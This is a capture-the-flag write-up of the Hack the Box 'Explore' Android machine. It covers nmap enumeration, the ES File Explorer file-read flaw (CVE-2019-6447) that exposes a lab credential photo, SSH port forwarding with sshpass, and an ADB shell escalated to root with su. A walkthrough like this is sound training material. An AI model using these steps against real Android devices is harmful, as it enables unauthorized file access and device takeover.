• Donald Ashdown

Hack the Box - Explore

Updated: Apr 20

Work flow




Summary

This was a beginner friendly machine with a steady workflow flow and no major obstacles. For the enumeration phase all ports had to be scanned in order to identify the correct attack vector. Following, a simple file traversal exploit on an ES file explorer server provides you with credentials after some looking around. These credentials allow for an SSH connection to the target server. From here we are able to port forward over ssh to access a filtered port and piggy back off this connection over ssh to use the ADB debugger to connect to the target with elevated privilege's and then expand into Administrator.


Tools used
  • nmap

  • autorecon

  • SSH pass

  • wget

  • linpeas

  • ADB

Processes/techniques
  • File traversal exploit

  • SSH port forwarding

  • Android OS ADB and ES File Explorer

References

Phase 1 - Enumeration

Starting off with a basic nmap scan we find only two ports.


Diving a little deeper and scanning all the ports reveals a wider attack surface, .


Performing an in depth port scan on those listed ports greatly expands our attack surface once again. (See nmap -sC -sV output below)


└─$ nmap 10.129.209.183 -sC -sV -p 2222,5555,38291,42135,59777

Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-11 12:34 EST

Nmap scan report for 10.129.209.183

Host is up (0.098s latency).


PORT STATE SERVICE VERSION

2222/tcp open ssh (protocol 2.0)

| fingerprint-strings:

| NULL:

|_ SSH-2.0-SSH Server - Banana Studio

| ssh-hostkey:

|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)

5555/tcp filtered freeciv

38291/tcp open unknown

| fingerprint-strings:

| GenericLines:

| HTTP/1.0 400 Bad Request

| Date: Thu, 11 Nov 2021 17:34:51 GMT

| Content-Length: 22

| Content-Type: text/plain; charset=US-ASCII

| Connection: Close

| Invalid request line:

| GetRequest:

| HTTP/1.1 412 Precondition Failed

| Date: Thu, 11 Nov 2021 17:34:51 GMT

| Content-Length: 0

| HTTPOptions:

| HTTP/1.0 501 Not Implemented

| Date: Thu, 11 Nov 2021 17:34:57 GMT

| Content-Length: 29

| Content-Type: text/plain; charset=US-ASCII

| Connection: Close

| Method not supported: OPTIONS

| Help:

| HTTP/1.0 400 Bad Request

| Date: Thu, 11 Nov 2021 17:35:12 GMT

| Content-Length: 26

| Content-Type: text/plain; charset=US-ASCII

| Connection: Close

| Invalid request line: HELP

| RTSPRequest:

| HTTP/1.0 400 Bad Request

| Date: Thu, 11 Nov 2021 17:34:57 GMT

| Content-Length: 39

| Content-Type: text/plain; charset=US-ASCII

| Connection: Close

| valid protocol version: RTSP/1.0

| SSLSessionReq:

| HTTP/1.0 400 Bad Request

| Date: Thu, 11 Nov 2021 17:35:12 GMT

| Content-Length: 73

| Content-Type: text/plain; charset=US-ASCII

| Connection: Close

| Invalid request line:

| ?G???,???`~?

| ??{????w????<=?o?

| TLSSessionReq:

| HTTP/1.0 400 Bad Request

| Date: Thu, 11 Nov 2021 17:35:12 GMT

| Content-Length: 71

| Content-Type: text/plain; charset=US-ASCII

| Connection: Close

| Invalid request line:

| ??random1random2random3random4

| TerminalServerCookie:

| HTTP/1.0 400 Bad Request

| Date: Thu, 11 Nov 2021 17:35:12 GMT

| Content-Length: 54

| Content-Type: text/plain; charset=US-ASCII

| Connection: Close

| Invalid request line:

|_ Cookie: mstshash=nmap

42135/tcp open http ES File Explorer Name Response httpd

|_http-title: Site doesn't have a title (text/html).

59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older

|_http-title: Site doesn't have a title (text/plain).

2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :

==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============

SF-Port2222-TCP:V=7.91%I=7%D=11/11%Time=618D543C%P=x86_64-pc-linux-gnu%r(N

SF:ULL,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");

==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============

SF-Port38291-TCP:V=7.91%I=7%D=11/11%Time=618D543B%P=x86_64-pc-linux-gnu




Phase 2 - Enumeration ES File Explorer & pivot into Initial foothold

Noticing the banner "ES File Explorer" I jumped over to google and

reviewed and researched the purpose and function of ES file explorer. I looked for vulnerabilities on exploit-db and came across the one below and it actually worked with a copy + paste on the first go. No modification required.

https://www.exploit-db.com/exploits/50070


The exploit allows the individual to read files and nothing more. Several command line arguments are available to us.


Available commands

listFiles
listPics
listVideos 
listApps 
listAppsSystem  
listAppsPhone  
listAppsSdcard
listAppsAll 
getFile      
getDeviceInfo 

After much searching around I finally listed the "Pics" where I found a photo of credentials.

Here was the output below.


==================================================================

| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |

| Coded By : Nehal a.k.a PwnerSec |

==================================================================


name : concept.jpg

time : 4/21/21 02:38:08 AM

location : /storage/emulated/0/DCIM/concept.jpg

size : 135.33 KB (138,573 Bytes)


name : anc.png

time : 4/21/21 02:37:50 AM

location : /storage/emulated/0/DCIM/anc.png

size : 6.24 KB (6,392 Bytes)


name : creds.jpg

time : 4/21/21 02:38:18 AM

location : /storage/emulated/0/DCIM/creds.jpg

size : 1.14 MB (1,200,401 Bytes)


name : 224_anc.png

time : 4/21/21 02:37:21 AM

location : /storage/emulated/0/DCIM/224_anc.png

size : 124.88 KB (127,876 Bytes)


Here we see the photo creds.jpg which is exactly what we need to progress!


kristi:Kr1sT!5h@Rp3xPl0r3!


Phase 3 - Initial foothold

We connect in with SSH over port 2222 as Kristi and land a very limited shell.

Looking around we eventually make our way into the sdcard directory and find the user.txt.



I was able to upload linpeas, however the file is restricted to root every time and I cannot change

Having failed with my previous attempt to execute linpeas, I attempted to execute directly in memory and this did not work either (With wget | bash)the permissions). From here I attempted to escalate the shell to python and this did not work.



Permissions are not on our as seen in the below photo.


Manual enumeration

At this point I pulled up some linux priv esc manual enumeration sheets and using uname -a helped clarify the version of Android we were running. Netstat however provided a great clue for our next move.


127|:/ $ uname -a

Linux localhost 4.9.214-android-x86_64-g04f9324 #1 SMP PREEMPT Wed Mar 25 17:11:29 CST 2020 x86_64

:/ $


netstat was not working but netstat -tulpn worked!



Seeing that port 5555 was open and listening on the inside, while being filtered from the outside I eventually clued in after far to long that this was something worth investigating.

Looking up android port 5555 we learn that Android devices are actually being shipped with port TCP 5555 enabled.

https://dev.to/exadra37/android-devices-being-shipped-with-tcp-port-5555-enabled-1ig5


Phase 4 - Escalate to root

For this phase of the engagement our goal is to access port 5555 which has to be done through the ADB debugger. This was very interesting as I guess all android devices are designed to communicate with an ADB debugger as a way of providing highly customizable features and system commands for developers.


To forward the port I had initially tried SSH which provided many issues so I switched to SSH- pass allowing me to store the password persistently. Sometimes if a password prompt is required it can timeout your sessions while operating out of the command line. The command line cannot always receive a popup designed for the desktop (GUI). SSHpass solves this.


sshpass -p 'Kr1sT!5h@Rp3xPl0r3!' ssh -L5555:localhost:5555 kristi@10.129.209.183 -p 2222


From here we connect the ADB debugger which we installed from command line to our target over port 2222 -> 5555. This is performed with the ADB connect command.


ADB connect 10.129.209.183:5555


From here we confirm that ADB is connected with the following command.

adb devices

Then we call an Android system shell with the ADB command below.

adb shell

Phase 4 - Root

This was actually quite embarrassing and just using the SU command to switch from the shell user to root won the day.

34 views0 comments